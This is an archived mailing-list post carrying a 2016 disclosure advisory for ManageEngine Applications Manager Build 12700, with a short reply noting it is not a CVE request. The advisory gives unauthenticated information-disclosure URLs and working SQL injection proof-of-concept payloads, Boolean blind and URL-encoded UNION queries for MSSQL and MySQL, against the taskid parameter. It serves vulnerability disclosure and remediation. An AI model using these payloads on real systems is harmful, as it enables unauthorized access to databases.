[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-Id: <D36B40EF-5DC1-41E1-AFAD-85CE7F5D20F2@elsherei.com>
Date: Fri, 6 May 2016 13:48:32 +0100
From: Saif El-Sherei <saif@...herei.com>
To: Saif El-Sherei <saif@...sepost.com>
Cc: oss-security@...ts.openwall.org, fulldisclosure@...lists.org,
dominic@...sepost.com, cve-assign@...re.org
Subject: Re: [FD] CVE Request for ManageEngine Applications Manager Build
No: 12700 Information Disclosure and Un-Authenticated SQL injection.
Heya,
I was already informed that the product is mot covered by Mitre CVE the release is just for responsible disclosure not CVE request.
Regards,
Saif
Sent from my iPhone
> On 5 May 2016, at 12:04, Saif El-Sherei <saif@...sepost.com> wrote:
>
> Heya,
>
> Wanted to request CVE for the following issues, that have been fixed by the vendor, fix details are at: https://www.manageengine.com/products/applications_manager/release-notes.html
>
> [SPSA-2016-02/ManageEngine ApplicationsManager]------------------------------
>
> SECURITY ADVISORY: SPSA-2016-02/ManageEngine Applications Manager Build No: 12700
>
> Affected Software: ManageEngine Applications Manager Build No: 12700
> Vulnerability: Information Disclosure and Un-Authenticated SQL
> injection.
> CVSSv3: 9.3
> Severity: Critical
> Release Date: 2016-05-05
>
> I. Background
> ~~~~~~~~~~~~~
>
> ManageEngine Applications Manager is an Application Performance Monitoring across physical, virtual and cloud environments.
>
>
> II. Description
> ~~~~~~~~~~~~~~~
>
> For details about the fix please visit https://www.manageengine.com/products/applications_manager/release-notes.html
>
> Information Disclosure:
> ~~~~~~~~~~~~~~~~~~~~~~~
>
> Some scripts were accessible without authentication, which allowed public access to sensitive data such as licensing information and Monitored Server Details like name IP and maintenance schedule.
>
> POC
> ~~~
>
> License Information:
> https://ManageEngineHost/jsp/About.jsp?context=/CAMGlobalReports.do?method=disableReports
>
> List of Maintenance tasks:
> https://ManageEngineHost/downTimeScheduler.do?method=maintenanceTaskListView&tabtoLoad=downtimeSchedulersDiv
>
> Details of Maintenance tasks with details about monitored server:
> https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=2&edit=true&readonly=false
>
> SQL Injection:
> ~~~~~~~~~~~~~~
>
> The downTimeScheduler.do script is vulnerable to a Boolean based blind, and Union based SQL injection, that allows complete unauthorized access to the back-end database, according to the level of privileges of the application database user.
>
> Vulnerable URL:
> https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=1
> Vulnerable Parameter: GET parameter taskid
>
> PoC:
> ~~~~
>
> Boolean Based Blind SQL Injection PoC:
>
> https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=1
> and 1=1 (True)
>
> https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=1
> and 1=2 (False)
>
> The following will include the Database Name in the Schedule Details
> Description text box:
>
> Union-Based SQL Injection PoC: Number of Columns 15, ORDER BY was
> usable.
>
> MSSQL: During our testing, the payload needed to be URL Encoded.
>
> https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=-1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2BISNULL%28CAST%28%28SELECT%20DB_NAME%28%29%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28107%29%2BCHAR%28112%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
>
> MYSQL: During our testing, the payload did not need URL Encoding.
>
> https://ManageEngineHost/downTimeScheduler.do?method=viewMaintenanceTask&taskid=-1%20UNION%20ALL%20SELECT%201,2,database(),4,5,6,7,8,9,10,11,12,13,14,15%20--
>
>
> III. Impact
> ~~~~~~~~~~~
>
> Information Disclosure Impact:
>
> An attacker might make use of the intelligence gathered through information leakages such as these for further attacks against the application, and its underlying infrastructure
>
> Un-Authenticated SQL Injection Impact:
>
> Access to sensitive information, stored in the application Database server, depending on the privileges of the application's database user.
>
>
> IV. Remediation
> ~~~~~~~~~~~~~~~
>
> Apply Vendor supplied patch build #12710, details are available at
> https://www.manageengine.com/products/applications_manager/release-notes.html
>
> V. Disclosure
> ~~~~~~~~~~~~~
>
> Reported By: Saif El-Sherei, @saif_sherei, saif@...sepost.com
>
> Discovery Date: 2016-02-29
> Vendor Informed: 2016-03-04
> Advisory Release Date: 2016-05-05
> Patch Release Date: 2016-04-28
> Advisory Updated: 2016-05-05
>
>
> ---------------------------------[SPSA-2016-02/ManageEngine ApplicationsManager]---
>
>
> Regards,
>
> Saif
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists